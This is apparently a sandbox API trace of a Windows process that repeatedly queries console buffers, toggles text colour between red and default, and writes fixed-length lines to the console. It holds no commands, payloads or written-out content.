[0086.064] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.064] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
[0086.065] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.065] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
[0086.066] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.066] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.066] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.067] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
[0086.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.068] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
[0086.068] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x331d138*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331d138*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.069] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
[0086.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.069] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
[0086.070] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.070] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.076] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.076] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.077] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
[0086.077] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.077] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
[0086.078] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x331d938*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331d938*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.079] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
[0086.080] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.080] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
[0086.081] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.081] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.082] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x87, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.082] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.082] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.083] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0xc) returned 1
[0086.083] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.083] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0xc) returned 1
[0086.084] WriteConsoleW (in: hConsoleOutput=0x8f, lpBuffer=0x331e138*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331e138*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.085] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.085] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0x7) returned 1
[0086.085] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.086] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0x7) returned 1
[0086.086] WriteConsoleW (in: hConsoleOutput=0x8f, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x93, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x97, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.088] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.088] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0xc) returned 1
[0086.088] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.088] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0xc) returned 1
[0086.089] WriteConsoleW (in: hConsoleOutput=0x9b, lpBuffer=0x331e938*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331e938*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.089] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.090] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0x7) returned 1
[0086.090] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.090] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0x7) returned 1
[0086.091] WriteConsoleW (in: hConsoleOutput=0x9b, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9f, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa3, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.092] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0xc) returned 1
[0086.093] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.093] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0xc) returned 1
[0086.094] WriteConsoleW (in: hConsoleOutput=0xa7, lpBuffer=0x331f138*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331f138*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.094] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.094] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0x7) returned 1
[0086.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.095] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0x7) returned 1
[0086.095] WriteConsoleW (in: hConsoleOutput=0xa7, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa7, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xab, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xaf, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.097] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0xc) returned 1
[0086.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.097] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0xc) returned 1
[0086.098] WriteConsoleW (in: hConsoleOutput=0xb3, lpBuffer=0x331f938*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x331f938*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.099] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0x7) returned 1
[0086.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.099] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0x7) returned 1
[0086.100] WriteConsoleW (in: hConsoleOutput=0xb3, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb3, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb7, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xbb, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xbf, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.101] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0xc) returned 1
[0086.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xbf, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.102] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0xc) returned 1
[0086.102] WriteConsoleW (in: hConsoleOutput=0xbf, lpBuffer=0x3320138*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3320138*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xbf, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.103] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0x7) returned 1
[0086.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xbf, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.104] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0x7) returned 1
[0086.104] WriteConsoleW (in: hConsoleOutput=0xbf, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xbf, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc3, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc7, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xcb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.106] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0xc) returned 1
[0086.106] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xcb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.106] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0xc) returned 1
[0086.107] WriteConsoleW (in: hConsoleOutput=0xcb, lpBuffer=0x3320938*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3320938*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.107] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xcb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.107] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0x7) returned 1
[0086.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xcb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.108] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0x7) returned 1
[0086.108] WriteConsoleW (in: hConsoleOutput=0xcb, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xcb, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xcf, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xd3, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.110] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xd7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.110] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0xc) returned 1
[0086.110] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xd7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.110] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0xc) returned 1
[0086.111] WriteConsoleW (in: hConsoleOutput=0xd7, lpBuffer=0x3321138*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3321138*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xd7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.112] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0x7) returned 1
[0086.112] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xd7, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.112] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0x7) returned 1
[0086.113] WriteConsoleW (in: hConsoleOutput=0xd7, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xd7, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xdb, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xdf, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xe3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.114] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0xc) returned 1
[0086.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xe3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.115] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0xc) returned 1
[0086.115] WriteConsoleW (in: hConsoleOutput=0xe3, lpBuffer=0x3321898*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3321898*, lpNumberOfCharsWritten=0x1c81a110*=0x33) returned 1
[0086.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xe3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.116] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0x7) returned 1
[0086.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xe3, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.116] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0x7) returned 1
[0086.117] WriteConsoleW (in: hConsoleOutput=0xe3, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xe3, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xe7, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xeb, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xef, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.119] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0xc) returned 1
[0086.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xef, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.119] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0xc) returned 1
[0086.120] WriteConsoleW (in: hConsoleOutput=0xef, lpBuffer=0x3321fa8*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3321fa8*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
[0086.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xef, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.120] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0x7) returned 1
[0086.121] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xef, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.121] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0x7) returned 1
[0086.122] WriteConsoleW (in: hConsoleOutput=0xef, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.122] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xef, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.122] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf3, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf7, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xfb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.123] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0xc) returned 1
[0086.124] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xfb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.124] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0xc) returned 1
[0086.124] WriteConsoleW (in: hConsoleOutput=0xfb, lpBuffer=0x3322708*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3322708*, lpNumberOfCharsWritten=0x1c81a110*=0x37) returned 1
[0086.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xfb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.125] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0x7) returned 1
[0086.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xfb, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.126] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0x7) returned 1
[0086.126] WriteConsoleW (in: hConsoleOutput=0xfb, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.127] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xfb, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.127] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xff, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.127] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x103, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.127] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x107, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.128] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0xc) returned 1
[0086.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x107, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.128] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0xc) returned 1
[0086.129] WriteConsoleW (in: hConsoleOutput=0x107, lpBuffer=0x3322e28*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3322e28*, lpNumberOfCharsWritten=0x1c81a110*=0x4f) returned 1
